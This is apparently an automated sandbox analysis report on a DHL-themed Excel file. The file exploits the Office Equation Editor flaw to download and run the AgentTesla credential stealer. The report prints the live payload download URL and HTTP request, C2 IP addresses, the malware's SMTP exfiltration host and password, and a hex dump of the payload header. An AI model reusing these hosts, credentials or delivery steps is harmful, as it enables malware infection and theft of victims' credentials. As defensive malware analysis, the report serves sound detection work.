Loading ...

Play interactive tourEdit tour

Analysis Report DHL-Address.xlsx

Overview

General Information

Sample Name:DHL-Address.xlsx
Analysis ID:339078
MD5:5de2e8bdb620804fd22d76f1e9fedf6e
SHA1:942ce29cd8138a1594ee416debf753d8eaa71528
SHA256:f5c3bea5b81c221bc8737bd8489154745c8d6644d7d19484218151f9a1c1f656
Tags:xlsx

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
Yara detected AntiVM_3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1296 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2492 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 1616 cmdline: 'C:\Users\Public\vbc.exe' MD5: B232B5C7754D932B07C0D47F934EFBFE)
      • vbc.exe (PID: 552 cmdline: C:\Users\Public\vbc.exe MD5: B232B5C7754D932B07C0D47F934EFBFE)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "lhYwFYIE", "URL: ": "https://jUxNbkiTmoSYxyvoDh.net", "To: ": "", "ByHost: ": "smtp.privateemail.com:587", "Password: ": "KY7mWKFAl", "From: ": ""}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2359575035.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000004.00000002.2165050170.0000000002511000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000005.00000002.2360425643.000000000259A000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.vbc.exe.400000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2492, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1616
              Sigma detected: EQNEDT32.EXE connecting to internetShow sources
              Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 192.210.214.178, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2492, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
              Sigma detected: File Dropped By EQNEDT32EXEShow sources
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2492, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
              Sigma detected: Executables Started in Suspicious FolderShow sources
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2492, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1616
              Sigma detected: Execution in Non-Executable FolderShow sources
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2492, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1616
              Sigma detected: Suspicious Program Location Process StartsShow sources
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2492, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1616

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Antivirus detection for URL or domainShow sources
              Source: http://globuserinessserverfiletransferprotocol.mangospot.net/csrss/vbc.exeAvira URL Cloud: Label: malware
              Found malware configurationShow sources
              Source: vbc.exe.552.5.memstrMalware Configuration Extractor: Agenttesla {"Username: ": "lhYwFYIE", "URL: ": "https://jUxNbkiTmoSYxyvoDh.net", "To: ": "", "ByHost: ": "smtp.privateemail.com:587", "Password: ": "KY7mWKFAl", "From: ": ""}
              Multi AV Scanner detection for submitted fileShow sources
              Source: DHL-Address.xlsxVirustotal: Detection: 47%Perma Link
              Source: DHL-Address.xlsxReversingLabs: Detection: 48%
              Machine Learning detection for dropped fileShow sources
              Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJoe Sandbox ML: detected
              Machine Learning detection for sampleShow sources
              Source: DHL-Address.xlsxJoe Sandbox ML: detected

              Exploits:

              barindex
              Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
              Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
              Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
              Source: C:\Users\Public\vbc.exeCode function: 4x nop then jmp 00741064h
              Source: global trafficDNS query: name: globuserinessserverfiletransferprotocol.mangospot.net
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.214.178:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.214.178:80

              Networking:

              barindex
              C2 URLs / IPs found in malware configurationShow sources
              Source: Malware configuration extractorURLs: https://jUxNbkiTmoSYxyvoDh.net
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 199.193.7.228:587
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 13 Jan 2021 12:17:21 GMTServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7Last-Modified: Wed, 13 Jan 2021 09:01:13 GMTETag: "ce000-5b8c461903ba5"Accept-Ranges: bytesContent-Length: 843776Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d9 b6 fe 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 d6 0c 00 00 08 00 00 00 00 00 00 3e f4 0c 00 00 20 00 00 00 00 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec f3 0c 00 4f 00 00 00 00 00 0d 00 c4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 d4 0c 00 00 20 00 00 00 d6 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c4 05 00 00 00 00 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0d 00 00 02 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 f4 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 3c 58 01 00 d8 a0 01 00 03 00 00 00 19 01 00 06 14 f9 02 00 d8 fa 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 1e 00 00 0a 2a 26 00 02 28 1f 00 00 0a 00 2a ce 73 20 00 00 0a 80 01 00 00 04 73 21 00 00 0a 80 02 00 00 04 73 22 00 00 0a 80 03 00 00 04 73 23 00 00 0a 80 04 00 00 04 73 24 00 00 0a 80 05 00 00 04 2a 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 25 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 26 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 27 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 28 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 29 00 00 0a 0a 2b 00 06 2a 26 00 02 28 2a 00 00 0a 00 2a 00 00 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 2b 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 2c 00 00 0a 6f 2d 00 00 0a 73 2e 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a
              Source: Joe Sandbox ViewIP Address: 199.193.7.228 199.193.7.228
              Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 199.193.7.228:587
              Source: global trafficHTTP traffic detected: GET /csrss/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: globuserinessserverfiletransferprotocol.mangospot.netConnection: Keep-Alive
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5B636490.emfJump to behavior
              Source: global trafficHTTP traffic detected: GET /csrss/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: globuserinessserverfiletransferprotocol.mangospot.netConnection: Keep-Alive
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
              Source: unknownDNS traffic detected: queries for: globuserinessserverfiletransferprotocol.mangospot.net
              Source: vbc.exe, 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
              Source: vbc.exe, 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
              Source: vbc.exe, 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmpString found in binary or memory: http://MLrjrg.com
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
              Source: vbc.exe, 00000005.00000002.2361765131.0000000005158000.00000004.00000001.sdmpString found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
              Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
              Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/TrustedCertificateServices.crl0:
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
              Source: vbc.exe, 00000005.00000002.2359948941.000000000081D000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
              Source: vbc.exe, 00000005.00000003.2357949309.0000000005158000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2359901613.00000000007AD000.00000004.00000020.sdmp, vbc.exe, 00000005.00000002.2359948941.000000000081D000.00000004.00000020.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.5.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
              Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.infonotary.com/responder.cgi0V
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://repository.infonotary.com/cps/qcps.html0$
              Source: vbc.exe, 00000005.00000002.2362156931.0000000005BD0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
              Source: vbc.exe, 00000005.00000002.2363028590.0000000006E50000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
              Source: vbc.exe, 00000005.00000002.2360554779.0000000002658000.00000004.00000001.sdmpString found in binary or memory: http://smtp.privateemail.com
              Source: vbc.exe, 00000005.00000002.2362156931.0000000005BD0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
              Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at/certificate-policy.html0
              Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at/certificate-policy.html0;
              Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at0E
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.acabogacia.org/doc0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.acabogacia.org0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.ancert.com/cps0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/dpc/0Z
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
              Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.certifikat.dk/repository0
              Source: vbc.exe, 00000005.00000002.2361765131.0000000005158000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
              Source: vbc.exe, 00000005.00000002.2361765131.0000000005158000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpString found in binary or memory: http://www.chambersign.org1
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.comsign.co.il/cps0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.crc.bg0
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
              Source: vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
              Source: vbc.exe, 00000005.00000002.2361765131.0000000005158000.00000004.00000001.sdmpString found in binary or memory: http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.disig.sk/ca0f
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.dnie.es/dpc0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.e-certchile.cl/html/productos/download/CPSv1.7.pdf01
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.e-me.lv/repository0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/SZSZ/0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.entrust.net/CRL/Client1.crl0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.firmaprofesional.com0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
              Source: vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpString found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
              Source: vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadis.bm0
